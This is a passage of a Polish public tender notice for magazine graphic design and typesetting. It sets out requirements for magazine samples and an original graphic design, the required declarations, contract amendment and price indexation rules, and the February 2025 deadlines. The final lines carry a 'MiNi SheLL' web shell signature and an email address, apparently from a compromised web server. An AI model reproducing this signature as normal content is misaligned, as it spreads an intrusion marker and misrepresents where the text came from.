3 miesięcy - Załącznik nr 6 do SWZ;<br/>b)	wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – Załącznik nr 7 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Wykonawcy: <br/>1) W celu uzyskania punktów w kryterium oceny ofert pn. „Jakość próbek czasopism” składają z ofertą przedmiotowe środki dowodowe w postaci przykładów wykonanych autorskich opracowań graficznych (wykonanych specjalnie na potrzeby ilustracji okładki czasopisma i artykułu w czasopiśmie) oraz przykładów składu artykułów, które zostały opublikowane w ciągu ostatnich 3 lat przed terminem składania ofert w czasopismach posiadających ISSN w języku polskim. Przykłady muszą pochodzić z czasopism, które nie będą zawierały jakichkolwiek treści (w tym zdjęć) niezgodnych z prawem, zagrażających prawom osób trzecich, naruszających dobre obyczaje, dyskryminujących ze względu na rasę, płeć, wiek, orientację seksualną, narodowość, niepełnosprawność, naruszających w jakikolwiek sposób godność ludzką, propagujących przemoc lub nienawiść, o charakterze erotycznym lub pornograficznym;<br/>2)	W celu uzyskania punktów w kryterium oceny ofert pn. „Jakość wykonanego zadania” składają z ofertą przedmiotowy środek dowodowy w postaci autorskiego projektu graficznego wykonanego zgodnie ze wskazanymi w Załączniku nr 8 do SWZ wytycznymi, jako plik produkcyjny w formacie PDF o wymiarach 19 x 19 cm. Autor projektu grafiki zostanie wskazany w wykazie osób, o którym mowa w rozdziale XV ust. 2 pkt 7) lit. b) SWZ, jako osoba skierowana do realizacji zamówienia, pod rygorem nie przyznania punktów w tym kryterium. Przez autorski projekt graficzny Zamawiający rozumie grafiki przygotowane specjalnie na potrzeby ilustracji składanej przez oferenta czasopisma. Nie mogą to być gotowe ilustracje i grafiki dostępne w płatnych i bezpłatnych bazach oraz programach graficznych. <br/>3)	Wykonawca, który do oferty załączy gotowe ilustracje i grafiki dostępne w płatnych i bezpłatnych bazach oraz programach graficznych w kryterium oceny ofert „Jakość wykonanego zadania” otrzyma 0 punktów w każdym z podkryteriów wymienionych w rozdziale XVII.<br/>2.	W odniesieniu do ust. 1 pkt 1) powyżej Wykonawca złoży wraz z ofertą próbki czasopism (w formacie PDF, w kolorze), które łącznie będą prezentowały:<br/>1)	2 przykłady okładek czasopisma, w których głównymi elementami ilustracyjnymi (zajmującym powyżej 50 procent powierzchni) są autorskie grafiki ilustracyjne,<br/>2)	2 przykłady składu artykułów w czasopiśmie wykonanego przez Wykonawcę, każdy z artykułów został zilustrowany przynajmniej dwoma (2) różnymi autorskimi ilustracjami graficznymi nawiązującymi do treści zawartej w artykule,<br/>3)	stopkę redakcyjną, w której będzie informacja, kto składał (jaka firma) czasopismo i kto wykonywał projekty graficzne.<br/>3.	Przez autorskie ilustracje graficzne Zamawiający rozumie grafiki przygotowane specjalnie na potrzeby ilustracji składanego przez oferenta czasopisma (nie mogą to być gotowe ilustracje dostępne w płatnych i bezpłatnych bazach oraz programach graficznych) i przygotowane przez osobę, którą Wykonawca będzie dysponował na potrzeby realizacji zamówienia. Osoba ta zostanie wskazana w wykazie osób, o którym mowa w rozdziale XV ust. 2 pkt 7) lit. b) SWZ, jako skierowana do realizacji zamówienia, pod rygorem nie przyznania punktów w odpowiednim podkryterium.<br/>4.	Próbki czasopism, o których mowa w ust. 1 pkt 1), Wykonawcy składają w formacie PDF, w kolorze, do upływu terminu składania ofert, w sposób określony w rozdziale XI ust. 4 SWZ.<br/>5.	Projekt graficzny, o którym mowa w ust. 1 pkt 2), Wykonawcy składają jako plik produkcyjny w formacie PDF, do upływu terminu składania ofert, w sposób określony w rozdziale XI ust. 4 SWZ.<br/>6.	Próbki, o których mowa w ust. 1 nie podlegają uzupełnieniu zgodnie z art. 107 ust. 3 Ustawy Pzp.<br/>7.	Niezłożenie próbek, o których mowa w ust. 1 będzie skutkowało przyznaniem „0” punktów w kryterium „Jakość próbek czasopism” lub „Jakość wykonanego zadania”. Próbki złożone po terminie składania ofert nie będą brane pod uwagę przy ocenie ofert w kryterium „Jakość próbek czasopism” lub „Jakość wykonanego zadania”. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4.	Wykonawca zobowiązany jest złożyć wraz z ofertą (Formularzem ofertowym) za pośrednictwem Platformy, podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osoby uprawnione, na zasadach określonych w rozdziale XV ust. 3 – 11 SWZ, dokumenty wymienione w rozdziale XV ust. 1 SWZ, tj.:<br/>1)	oświadczenie dotyczące spełniania warunków udziału w postępowaniu oraz przesłanek wykluczenia z postępowania (Załącznik nr 3 do SWZ);<br/>2)	przedmiotowe środki dowodowe (próbki czasopism), o których mowa w rozdziale VI ust. 1 pkt 1) SWZ - w formie dokumentów elektronicznych podpisanych przez Wykonawcę kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/>3)	przedmiotowe środki dowodowe (projekt graficzny), o których mowa w rozdziale VI ust. 1 pkt 2) SWZ – jako plik produkcyjny w formacie PDF;<br/>4)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania; /Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych. Wykonawca powinien wskazać dane umożliwiające dostęp do tych dokumentów/<br/>5)	dowody dot. „samooczyszczenia” (jeżeli dotyczy);<br/>6)	pełnomocnictwa (jeżeli dotyczy);<br/>7)	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 117 ust. 4 Ustawy Pzp (jeżeli dotyczy);<br/>8)	zobowiązanie podmiotu trzeciego (opcjonalnie);<br/>9)	zastrzeżenie tajemnicy przedsiębiorstwa (opcjonalnie); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i do zawarcia umowy.<br/>2. Wykonawcy, którzy złożyli wspólną ofertę ponoszą, w razie wybrania ich oferty przez Zamawiającego, solidarną odpowiedzialność wobec Zamawiającego za wykonanie umowy.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w stosunku do żadnego z Wykonawców nie zachodzą przesłanki podstaw do wykluczenia z postępowania.<br/>4. Każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oświadczenie z art. 125 ust. 1 Ustawy. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy.<br/>5. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców, w której m.in. zostanie określony pełnomocnik uprawniony do kontaktów z Zamawiającym oraz do wystawiania dokumentów.<br/>6. Na podstawie art. 60 Ustawy Pzp Zamawiający zastrzega obowiązek osobistego wykonania kluczowych zadań przedmiotu zamówienia przez wykonawcę wykazującego się dysponowaniem osobami wskazanymi w rozdziale XIV ust. 1 pkt 2) lit. b) SWZ.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o zamówienie co najmniej jeden z wykonawców występujących wspólnie powinien wykazać się całością doświadczenia wskazanego w ust. 1 pkt 2) lit. a) SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana Umowy dopuszczalna jest w zakresie i na warunkach przewidzianych poniżej:<br/>1) zmiany terminu realizacji poszczególnych etapów, o których mowa w rozdziale III ust. 2 OPZ, z przyczyn niezawinionych<br/>przez Strony. Wykonawca zobowiązany jest przedłożyć uzasadnienie oraz dokumenty niezbędne do oceny przez Zamawiającego, czy zmiana terminu ma bezpośredni wpływ na prawidłową realizację Umowy;<br/>2) Zamawiający przewiduje możliwość zmiany obowiązywania Umowy poprzez możliwość jej wydłużenia o maksymalnie 12 miesięcy w stosunku do terminu wskazanego w § 2 ust. 1 Wzoru umowy w przypadku wystąpienia przyczyn niezależnych od Zamawiającego lub braku wyczerpania kwoty maksymalnej Umowy określonej w § 6 ust. 1 Wzoru umowy;<br/>3) w zakresie sposobu realizacji Umowy lub terminu realizacji Umowy w przypadku zaistnienia siły wyższej.<br/>2. Zamawiający, w przypadku gdy czas trwania Umowy przekroczy okres 12 miesięcy, przewiduje możliwość zmiany wysokości cen jednostkowych lub wynagrodzenia Wykonawcy za realizację etapów, w formie pisemnego aneksu, w przypadku wystąpienia co najmniej jednej z następujących okoliczności:<br/>1) zmiana wysokości stawki podatku od towarów i usług;<br/>2) zmiana wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2020 r. poz. 2207.);<br/>3) zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2020 r. poz. 1342, z późn. zm.) - jeżeli zmiany te będą miały wpływ na koszty wykonania Umowy przez Wykonawcę.<br/>3. Dopuszcza się zmianę wysokości cen jednostkowych lub wynagrodzenia należnego Wykonawcy zgodnie z art. 439 ust. 2 ustawy Pzp, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia tj. wzrostu lub obniżenia względem ceny lub kosztu dla wynagrodzenia ofertowego. Nowe wynagrodzenie obowiązuje od dnia zawarcia aneksu do<br/>Umowy, z zastrzeżeniem, że pierwsza waloryzacja może nastąpić nie wcześniej niż po upływie 6 miesięcy od dnia zawarcia Umowy. Strona wnioskująca o zmianę wynagrodzenia dokona wyliczenia zmiany wynagrodzenia i różnic po waloryzacji. Wzrost liczony jest wyłącznie w stosunku do zakresu pozostającego do wykonania po upływie 6 miesięcy od dnia zawarcia Umowy.<br/>4. Strony dopuszczają waloryzację, jeżeli zmiana cen materiałów i kosztów przekroczy 10% w stosunku do cen i kosztów w chwili zawarcia Umowy.<br/>5. Maksymalną wartością zmiany wynagrodzenia jaką dopuszcza Zamawiający, w efekcie zastosowania postanowień o zasadach wprowadzenia zmian wysokości wynagrodzenia jest zmiana o 10% w stosunku do wysokości wynagrodzenia z chwili zawarcia aneksu.<br/>6. W przypadku wystąpienia sytuacji określonej w ust. 3 zmiana wynagrodzenia zostanie określona w oparciu o średnioroczny wskaźnik wzrostu cen towarów i usług konsumpcyjnych GUS za rok poprzedni, opublikowany w Komunikacie Prezesa Głównego Urzędu Statystycznego.<br/>7. Zmiana wynagrodzenia może być dokonana nie częściej niż raz na miesiąc.<br/>8. Z uwagi na ograniczoną liczbę znaków szczegółowe uregulowania znajdują się w Załączniku nr 9 do SWZ - Wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-13 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://sgh.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-13 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com